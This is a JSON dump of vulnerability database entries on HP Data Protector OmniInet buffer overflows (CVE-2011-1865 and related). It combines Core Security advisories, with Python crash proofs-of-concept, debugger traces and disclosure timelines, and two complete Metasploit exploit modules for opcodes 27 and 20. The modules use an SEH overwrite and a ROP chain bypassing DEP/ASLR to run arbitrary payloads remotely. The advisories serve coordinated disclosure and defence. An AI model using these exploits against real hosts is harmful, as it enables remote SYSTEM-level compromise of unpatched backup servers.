\n \n \n007cdd8c 0041143e 00000000 00000000 00156490 omniinet+0x7ed0 \n007cea3c 0040892b 00000001 0046b9f0 00000000 omniinet+0x1143e \n007cf4b8 00408f02 00000000 00000000 00156490 omniinet+0x892b \n007cf518 0040a42c 00000000 7ad5f7f9 00000000 omniinet+0x8f02 \n007cffa0 77df352b 00000001 00156498 0012e7f8 omniinet+0xa42c \n007cffb4 7c80b713 00156490 00000000 0012e7f8 \nADVAPI32!CryptVerifySignatureW+0x29 \n007cffec 00000000 77df3519 00156490 00000000 \nkernel32!GetModuleFileNameA+0x1b4 \n \n- -----/ \n \n \n8.9. *Vulnerability 9. Opcode 20.* \n \n[CVE-2011-1515] This vulnerability is reproduced with the following command: \n\"poc.py 127.0.0.1 20 1 7 6\" \nThe process terminates without generating an exception, resulting in a \ndenial of service condition. \n \n \n9. *Report Timeline* \n \n. 2011-06-02: \nCore Security Technologies notifies HP Security Alert team of the \nvulnerabilities. Publication date is temporarily set to July 5th, 2011. \n \n. 2011-06-06: \nVendor acknowledges receipt. \n \n. 2011-06-06: \nCore sends technical details to the vendor. \n \n. 2011-06-06: \nVendor confirms that a new case was assigned within HP Software Security \nResponse Team (SSRT). \n \n. 2011-06-16: \nCore requests an update on this issue, in particular Core asks the \nvendor for a technical analysis of the bugs, a list of affected products \nand versions, and the vendor's plan for providing a fix (no reply \nreceived). \n \n. 2011-06-23: \nCore requests once more an update. \n \n. 2011-06-28: \nVendor communicates that a security bulletin will be issued on the same \nday (June 28). The vendor confirms the vulnerabilities, and recommends \nas mitigation to enable encrypted communications in the cell server and \nclient. \n \n. 2011-06-28: \nCore requests a link to the vendor's bulletin, and asks whether CVE ids \nhave been assigned. \n \n. 2011-06-28: \nVendor provides a link to the bulletin and CVE names for the \nvulnerabilities. \n \n. 
2011-06-29: \nAdvisory CORE-2011-0514 is published. \n \n \n10. *References* \n \n[1] HP Data Protector http://hp.com/go/dataprotector \n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, \nRemote Execution of Arbitrary Code \nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. 
*Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \n \niEUEARECAAYFAk4LmqsACgkQyNibggitWa02bgCYyTgE3BmdxGGAOY4dNZqmekvo \nCwCfTapBtDaQT/LBrrVC7K4l8G5hnEo= \n=ozGY \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102673/CORE-2011-0514.txt"}, {"lastseen": "2016-12-05T22:20:32", "description": "", "published": "2011-06-30T00:00:00", "type": "packetstorm", "title": "Core Security Technologies Advisory 2011.0606", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1866"], "modified": "2011-06-30T00:00:00", "id": "PACKETSTORM:102677", "href": "https://packetstormsecurity.com/files/102677/Core-Security-Technologies-Advisory-2011.0606.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nCore Security Technologies - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nHP Data Protector EXEC_CMD Buffer Overflow Vulnerability \n \n \n1. *Advisory Information* \n \nTitle: HP Data Protector EXEC_CMD Buffer Overflow Vulnerability \nAdvisory ID: CORE-2011-0606 \nAdvisory URL: \nhttp://www.coresecurity.com/content/HP-Data-Protector-EXECCMD-Vulnerability \nDate published: 2011-06-29 \nDate of last update: 2011-06-29 \nVendors contacted: HP \nRelease mode: Coordinated release \n \n \n2. 
*Vulnerability Information* \n \nClass: Remote stack overflow [CWE-120] \nImpact: Code execution \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2011-1866 \n \n \n3. *Vulnerability Description* \n \nHP Data Protector [1] is an automated backup and recovery software for \nsingle-server to enterprise environments. A vulnerability in HP Data \nProtector could allow a remote attacker to execute arbitrary code. The \nvulnerability is triggered by sending a request to port 5555 of a host \nrunning the \"data protector inet\" service, part of HP Data Protector. \n \n \n4. *Vulnerable packages* \n \n. HP OpenView Storage Data Protector v6.20 (running on Windows). \n. HP OpenView Storage Data Protector v6.11 (running on Windows). \n. HP OpenView Storage Data Protector v6.10 (running on Windows). \n. HP OpenView Storage Data Protector v6.00 (running on Windows). \n. Previous versions may be affected, but were not tested. \n \n \n5. *Non-vulnerable packages* \n \n. No fixes are available at the time of publication. \n \n \n6. *Vendor Information, Solutions and Workarounds* \n \nHP has issued a security bulletin with document ID c02872182 [2] \navailable through HP Support Center at http://www.hp.com/go/HPSC. \n \nThe latest version of HP Data Protector is vulnerable to this issue. HP \nhas provided the following procedure to mitigate this vulnerability: \n \n1. Upgrade to Data Protector A.06.20 or subsequent. \n2. Enable encrypted control communication services on cell server and \nall clients in cell. \n \nThe upgrade is available for download from \nhttp://hp.com/go/dataprotector then under 'Product Information' click on \n'Trials and Demos'. \n \n \n7. *Credits* \n \nThis vulnerability was discovered and researched by Nahuel C. Riva from \nCore Security Technologies. Publication was coordinated by Carlos Sarraute. \n \n \n8. *Technical Description / Proof of Concept Code* \n \nThe following python script can be used to reproduce the bug. 
\n \n/----- \nimport sys \nimport socket \n \nfrom struct import pack \n \nip = sys.argv[1] \nport = int(sys.argv[2]) # default tcp port 5555 \n \ntarget = (ip, port) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect(target) \n \npath = 'A' * 5000 \n \npacket = pack('<L', 0x20003220) \npacket += pack('<L', 0x00302000) \npacket += '\\x20' \npacket += pack('>H', 0x0020) \npacket += pack('<L', 0x00432000) \npacket += pack('<L', 0x00303220) \npacket += '\\x20' \npacket += 'omnicheck.exe' \npacket += pack('>H', 0x0020) \npacket += pack('>H', 0x0020) * 4 \npacket += pack('<L', 0x30200030) \npacket += pack('>H', 0x0020) \npacket += path \npacket += pack('>H', 0x0000) \n \nplen = pack('>L', len(packet)) \n \ns.send(plen + packet) \n \n- -----/ \nBy executing this script, the omniinet.exe process crashes in the \nfollowing EIP: \n \n/----- \n7C8285D3 8B0424 MOV EAX,DWORD PTR SS:[ESP] \n7C8285D6 8BE5 MOV ESP,EBP \n7C8285D8 5D POP EBP \n7C8285D9 C3 RETN \n \n- -----/ \nThis is part of a function inside the ntdll.dll library, however, if we \nlook the SEH chain, we can see that the SEH handler was overwritten with \nthe value 0x00410041 (the unicode value for \"AA\"): \n \n/----- \nSEH chain of thread 00000578 \nAddress SE handler \n009AFF94 omniinet.00410041 \n00410041 A3004472 \n \n- -----/ \nThe following are the values of the CPU registers at the time of the \ncrash: \n \n/----- \nEAX C0000008 \nECX 009AEC98 \nEDX 7C82859C ntdll.KiRaiseUserExceptionDispatcher \nEBX 0015B480 \nESP 009AEC44 \nEBP 009AEC94 \nESI 00155A80 \nEDI 00000000 \nEIP 7C8285D3 ntdll.7C8285D3 \nC 0 ES 0023 32bit 0(FFFFFFFF) \nP 1 CS 001B 32bit 0(FFFFFFFF) \nA 0 SS 0023 32bit 0(FFFFFFFF) \nZ 0 DS 0023 32bit 0(FFFFFFFF) \nS 0 FS 003B 32bit 7FFDB000(FFF) \nT 0 GS 0000 NULL \nD 0 \nO 0 LastErr ERROR_SUCCESS (00000000) \nEFL 00000206 (NO,NB,NE,A,NS,PE,GE,G) \nST0 empty 0.0 \nST1 empty 0.0 \nST2 empty 0.0 \nST3 empty 0.0 \nST4 empty 0.0 \nST5 empty 0.0 \nST6 empty 0.7610000000000000098 
\nST7 empty 1.0000000000000000000 \n3 2 1 0 E S P U O Z D I \nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ) \nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 \n \n- -----/ \nThe problem is in the 0041D170 function. This function does a blind \ncopy of the string passed in the packet as a path: \n \n/----- \n0041D170 /$ 55 PUSH EBP \n0041D171 |. 8BEC MOV EBP,ESP \n0041D173 |. 51 PUSH ECX \n0041D174 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] \n0041D177 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX \n0041D17A |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8] \n0041D17D |. 0FB711 MOVZX EDX,WORD PTR DS:[ECX] \n0041D180 |. 85D2 TEST EDX,EDX \n0041D182 |. 74 73 JE SHORT omniinet.0041D1F7 \n[...] \n0041D1F7 |> 8B45 0C /MOV EAX,DWORD PTR SS:[EBP+C] \n0041D1FA |. 0FB708 |MOVZX ECX,WORD PTR DS:[EAX] \n0041D1FD |. 85C9 |TEST ECX,ECX \n0041D1FF |. 74 26 |JE SHORT omniinet.0041D227 \n0041D201 |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8] \n0041D204 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX \n0041D207 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8] \n0041D20A |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C] \n0041D20D |. 66:8B11 |MOV DX,WORD PTR DS:[ECX] \n0041D210 |. 66:8910 |MOV WORD PTR DS:[EAX],DX // copy WORDs \nto the stack \n0041D213 |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8] \n0041D216 |. 83C0 02 |ADD EAX,2 \n0041D219 |. 8945 08 |MOV DWORD PTR SS:[EBP+8],EAX \n0041D21C |. 8B4D 0C |MOV ECX,DWORD PTR SS:[EBP+C] \n0041D21F |. 83C1 02 |ADD ECX,2 \n0041D222 |. 894D 0C |MOV DWORD PTR SS:[EBP+C],ECX \n0041D225 |.^EB D0 \\JMP SHORT omniinet.0041D1F7 \n0041D227 |> 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8] \n0041D22A |. 66:C702 0000 MOV WORD PTR DS:[EDX],0 \n0041D22F |. 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] \n0041D232 |. 8BE5 MOV ESP,EBP \n0041D234 |. 5D POP EBP \n0041D235 \\. C3 RETN \n \n- -----/ \n \n \n \n9. *Report Timeline* \n \n. 2011-06-06: \nCore Security Technologies notifies the HP team of the vulnerabilities \nand provides the technical details. Publication date is temporarily set \nto July 5th, 2011. \n \n. 
2011-06-06: \nVendor confirms that a new case was assigned within HP Software Security \nResponse Team (SSRT). \n \n. 2011-06-16: \nCore requests an update on this issue, in particular Core asks the \nvendor for a technical analysis of the bugs, a list of affected products \nand versions, and the vendor's plan for providing a fix (no reply \nreceived). \n \n. 2011-06-23: \nCore requests once more an update. \n \n. 2011-06-28: \nVendor communicates that a security bulletin will be issued on the same \nday (June 28). The vendor confirms the vulnerabilities, and recommends \nas mitigation to enable encrypted communications in the cell server and \nclient. \n \n. 2011-06-28: \nCore requests a link to the vendor's bulletin, and asks whether CVE ids \nhave been assigned. \n \n. 2011-06-28: \nVendor provides a link to the bulletin and CVE names for the \nvulnerabilities. \n \n. 2011-06-29: \nAdvisory CORE-2011-0606 is published. \n \n \n \n10. *References* \n \n[1] HP Data Protector http://hp.com/go/dataprotector \n[2] HPSBMU02686 SSRT100541 rev.2 - HP OpenView Storage Data Protector, \nRemote Execution of Arbitrary Code \nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182 \n \n \n11. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n \n12. 
*About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n \n13. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2011 Core Security \nTechnologies and (c) 2011 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n \n14. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. 
\n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \n \niEYEARECAAYFAk4LnZsACgkQyNibggitWa07/ACfSlzkBvbowAskeP/K4FqtxCay \nEAkAnRCPKdc35t5Cb0ZJbGy4me4JRALo \n=zHon \n-----END PGP SIGNATURE----- \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102677/CORE-2011-0606.txt"}, {"lastseen": "2016-12-05T22:22:11", "description": "", "published": "2011-07-02T00:00:00", "type": "packetstorm", "title": "HP OmniInet.exe Opcode 27 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-02T00:00:00", "id": "PACKETSTORM:102732", "href": "https://packetstormsecurity.com/files/102732/HP-OmniInet.exe-Opcode-27-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_omniinet_3.rb 13081 2011-07-01 22:26:12Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OmniInet.exe Opcode 27 Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in the Hewlett-Packard \nOmniInet NT Service. By sending a specially crafted opcode 27 packet, \na remote attacker may be able to execute arbitrary code. 
\n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 13081 $', \n'References' => \n[ \n[ 'CVE', '2011-1865' ], \n[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], \n], \n'Privileged' => true, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Payload' => \n{ \n'Space' => 800, \n'BadChars' => \"\\x00\", \n'StackAdjustment' => -3500 \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243', \n{ \n#POP/POP/RET from OmniBack\\bin\\MSVCR71.dll \n'Ret' => 0x7c35630d \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Jun 29 2011')) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef check \n \nconnect \nsock.put(rand_text_alpha_upper(64)) \nresp = sock.get_once(-1,5) \ndisconnect \n \nif (resp) \nresp = resp.unpack('v*').pack('C*') \nprint_status(\"Received response: \" + resp) \n \n# extract version \nif (resp =~ /HP Data Protector/) \nversion = resp.split[3] \nelsif (resp =~ /HP OpenView Storage Data Protector/) \nversion = resp.split[5] \nelsif (resp =~ /HP StorageWorks Application Recovery Manager/) \nversion = resp.split[5] \nelse \nreturn Exploit::CheckCode::Detected \nend \n \nversion = version.split('.') \nmajor = version[1].to_i \nminor = version[2].to_i \nif ((major < 6) or (major == 6 and minor < 11)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nif ((major > 6) or (major == 6 and minor >= 11)) \nreturn Exploit::CheckCode::Safe \nend \n \nend \nreturn Exploit::CheckCode::Safe \n \nend \n \ndef exploit \n \nconnect \n \ntrigger = rand_text_alpha_upper(10000) \ntrigger[4552, payload.encoded.length] = payload.encoded \ntrigger[5352, 8] = generate_seh_record(target.ret) \ntrigger[5360, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-788\").encode_string \n \nopcode = \"27\" \n \npacket = Rex::Text.to_unicode(\"\\x00\") \npacket << \"\\x27\\xca\" #length \npacket << \"\\xff\\xfe\\x32\" \npacket 
<< \"\\x00\\x00\\x00\" \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 3 \npacket << Rex::Text.to_unicode(\"\\x20\") \npacket << trigger \npacket << Rex::Text.to_unicode(\"\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\" + opcode + \"\\x00\") \npacket << Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 24 \n \nprint_status(\"Trying #{target.name}...\") \nsock.put(packet) \n \nselect(nil,nil,nil,10) \nhandler \ndisconnect \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102732/hp_omniinet_3.rb.txt"}, {"lastseen": "2016-12-05T22:13:45", "description": "", "published": "2011-07-04T00:00:00", "type": "packetstorm", "title": "HP OmniInet.exe Opcode 20 Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1865"], "modified": "2011-07-04T00:00:00", "id": "PACKETSTORM:102746", "href": "https://packetstormsecurity.com/files/102746/HP-OmniInet.exe-Opcode-20-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_omniinet_4.rb 13092 2011-07-04 17:02:40Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"HP OmniInet.exe Opcode 20 Buffer Overflow\", \n'Description' => %q{ \nThis module exploits a vulnerability found in HP Data Protector's OmniInet \nprocess. 
By supplying a long string of data as the file path with opcode '20', \na buffer overflow can occur when this data is being written on the stack where \nno proper bounds checking is done beforehand, which results arbitrary code \nexecution under the context of SYSTEM. This module is also made against systems \nsuch as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR \nenabled by default. \n}, \n'License' => MSF_LICENSE, \n'Version' => \"$Revision: 13092 $\", \n'Author' => \n[ \n'Oren Isacson', #Initial discovery, poc \n'muts', #Initial poc of the ROP exploit w/ dookie \n'dookie2000ca', #Initial poc of the ROP exploit w/ muts \n'sinn3r', #MSF module with corelanc0d3r (Also Thx to MC and HD) \n'corelanc0d3r', #MSF module with sinn3r \n], \n'References' => \n[ \n[ 'CVE', '2011-1865' ], \n[ 'URL', 'http://www.exploit-db.com/exploits/17468/' ], \n[ 'URL', 'http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182' ], \n], \n'Payload' => \n{ \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\x66\\x81\\xc4\\xb8\\x0b\\x61\\x9d\", #add sp, 0xb88; popad; popfd \n}, \n'DefaultOptions' => \n{ \n'ExitFunction' => \"process\", \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n#If 'Max' gets too long (ie. 
10000 bytes), we can get a busted heap \n[ \n'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on XP SP3 or Win Server 2003', \n{ \n'Offset' => 2005, #For overwriting a RETN (6481 for SEH) \n'Ret' => 0x7C342629, #RETN - MSVCR71.dll \n'Max' => 5000, \n} \n], \n[ \n'HP Data Protector A.06.10 Build 611 / A.06.11 Build 243 on Win Server 2008', \n{ \n'Offset' => 1993, #For overwriting a RETN (6481 for SEH) \n'Ret' => 0x7C342629, #RETN - MSVCR71.dll \n'Max' => 5000, \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Jun 29 2011\", \n'DefaultTarget' => 0)) \n \nregister_options([Opt::RPORT(5555)], self.class) \nend \n \ndef nop \nreturn make_nops(4).unpack(\"L\")[0].to_i \nend \n \ndef exploit \n \nconnect \n \n#mona.py tekniq \n#https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/ \nrop = [ \n#Initial setup \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n0x7C342629, # SLIDE \n#ROP begins here \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x7c37a140, # Make EAX readable \n0x7c37591f, # PUSH ESP # ... 
# POP ECX # POP EBP # RETN (MSVCR71.dll) \nnop, # EBP \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x7c37a140, # <- VirtualProtect() found in IAT \n0x7c3530ea, # MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) \n0x7c346c0b, # Slide, so next gadget would write to correct stack location \n0x7c376069, # MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) \nnop, # EDI (filler) \nnop, # will be patched at runtime (VP), then picked up into ESI \nnop, # EBX (filler) \n0x7c376402, # POP EBP # RETN (msvcr71.dll) \n0x7c345c30, # ptr to push esp # ret (from MSVCR71.dll) \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0xfffff82f, # size 20001 bytes \n0x7c351e05, # NEG EAX # RETN (MSVCR71.dll) \n0x7c354901, # POP EBX # RETN (MSVCR71.dll) \n0xffffffff, # pop value into ebx \n0x7c345255, # INC EBX # FPATAN # RETN (MSVCR71.dll) \n0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) \n0x7c34d201, # POP ECX # RETN (MSVCR71.dll) \n0x7c38b001, # RW pointer (lpOldProtect) (-> ecx) \n0x7c34b8d7, # POP EDI # RETN (MSVCR71.dll) \n0x7c34b8d8, # ROP NOP (-> edi) \n0x7c344f87, # POP EDX # RETN (MSVCR71.dll) \n0xffffffc0, # value to negate, target value : 0x00000040, target: edx \n0x7c351eb1, # NEG EDX # RETN (MSVCR71.dll) \n0x7c346c0a, # POP EAX # RETN (MSVCR71.dll) \n0x90909090, # NOPS (-> eax) \n0x7c378c81, # PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) \n].pack('V*') \n \n#Overflowing path \"C:\\Program Files\\OmniBack\\bin\\\" \n#4807 bytes after target.ret, but we need to use less than that to avoid a busted heap \nsploit = '' \nsploit << rand_text_alpha(target['Offset']-sploit.length) \nsploit << [target.ret].pack('V*') \nsploit << rop \nsploit << payload.encoded \nsploit << rand_text_alpha(target['Max']-sploit.length) \n \npkt = '' \npkt << Rex::Text.to_unicode(\"\\x00\") \npkt << \"\\x41\\x41\" #Length field place holder \npkt << \"\\xff\\xfe\" \npkt << Rex::Text.to_unicode(\"\\x32\\x00\") \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 5) \npkt << 
Rex::Text.to_unicode(\"\\x20\") \npkt << Rex::Text.to_unicode(\"20\") #Opcode \npkt << \"\\x00\" \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 7) \npkt << Rex::Text.to_unicode(\"\\x20\\x00\") \npkt << sploit \npkt << Rex::Text.to_unicode(\"\\x00\") \npkt << (Rex::Text.to_unicode(\"\\x20\\x61\\x00\") * 16) \n \n#pkt length \npkt[2,2] = [pkt.length-5].pack('n') \n \nprint_status(\"Sending packet to #{datastore['RHOST']}...\") \nsock.put(pkt) \n \n#Data Protector lags before triggering the vuln code \n#Long delay seems necessary to ensure we get a shell back \nselect(nil,nil,nil,20) \n \nhandler \ndisconnect \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/102746/hp_omniinet_4.rb.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:18", "description": "\nHP Data Protector 6.20 - Multiple Vulnerabilities", "edition": 1, "published": "2011-06-29T00:00:00", "title": "HP Data Protector 6.20 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1515", "CVE-2011-1514", "CVE-2011-1865"], "modified": "2011-06-29T00:00:00", "id": "EXPLOITPACK:357E2A5253FECAF999A26172A2781370", "href": "", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n Core Security Technologies - Corelabs Advisory\n http://corelabs.coresecurity.com/\n\n Multiple vulnerabilities in HP Data Protector\n\n\n1. *Advisory Information*\n\nTitle: Multiple vulnerabilities in HP Data Protector\nAdvisory ID: CORE-2011-0514\nAdvisory URL:\nhttp://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities\nDate published: 2011-06-29\nDate of last update: 2011-06-29\nVendors contacted: HP\nRelease mode: Coordinated release\n\n\n2. 
*Vulnerability Information*\n\nClass: Remote stack overflow [CWE-120], Null pointer dereference\n[CWE-476], Improper input validation [CWE-20]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1865, CVE-2011-1514, CVE-2011-1515\n\n\n3. *Vulnerability Description*\n\nHP Data Protector [1] is an automated backup and recovery software for\nsingle-server to enterprise environments. Multiple vulnerabilities have\nbeen found in HP Data Protector that could allow a remote attacker to\nexecute arbitrary code and lead to denial of service conditions. The\nvulnerabilities are triggered by sending a request to port 5555 of a\nhost running the \"data protector inet\" service, part of HP Data\nProtector. The request has several parameters, including an opcode. By\nsending requests with specially crafted parameters, the different bugs\ncan be triggered.\n\n\n4. *Vulnerable packages*\n\n . HP OpenView Storage Data Protector v6.20 (running on Windows).\n . HP OpenView Storage Data Protector v6.11 (running on Windows).\n . HP OpenView Storage Data Protector v6.10 (running on Windows).\n . HP OpenView Storage Data Protector v6.00 (running on Windows).\n . Previous versions may be affected, but were not tested.\n\n\n5. *Non-vulnerable packages*\n\n . No fixes are available at the time of publication.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nHP has issued a security bulletin with document ID c02872182 [2]\navailable through HP Support Center at http://www.hp.com/go/HPSC.\n\nThe latest version of HP Data Protector is vulnerable to these issues.\nHP has provided the following procedure to mitigate these vulnerabilities:\n\n 1. Upgrade to Data Protector A.06.20 or subsequent.\n 2. Enable encrypted control communication services on cell server and\nall clients in cell.\n\n The upgrade is available for download from\nhttp://hp.com/go/dataprotector then under 'Product Information' click on\n'Trials and Demos'.\n\n\n7. 
*Credits*\n\nThese vulnerabilities were discovered by Oren Isacson from Core Security\nTechnologies. Publication was coordinated by Carlos Sarraute.\n\n\n8. *Technical Description / Proof of Concept Code*\n\nThe following python script can be used to reproduce the different bugs.\n\n/-----\nimport struct, socket, sys\n\ntarget = sys.argv[1]\nopcode = sys.argv[2]\nstring_lenght = int(sys.argv[3])\nargs_number = int(sys.argv[4])\nlong_argument = int(sys.argv[5])\n\ndef to_wc(x):\n return ''.join([\"%s\\x00\" % c for c in x] )\n\nargs = [to_wc('a')] * args_number\nargs[5] = to_wc(opcode)\nargs[long_argument] = 'a' * string_lenght\npacket = [\"\\xff\\xfe\\x32\\x00\\x00\\x00\"]\n\nfor s in args:\n packet.append(\"\\x20\\x00\" + s + \"\\x00\\x00\")\n\npacket = ''.join(packet)\npacket = struct.pack(\">L\", len(packet)) + packet\n\nsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nsock.connect((target, 5555))\nsock.send(packet)\n\n- -----/\n\n\nIn the following sections, we give the command line details to reproduce\neach bug, and a brief description of the effect produced.\n\n\n8.1. *Vulnerability 1. Opcodes 20 y 28.*\n\n[CVE-2011-1865] This 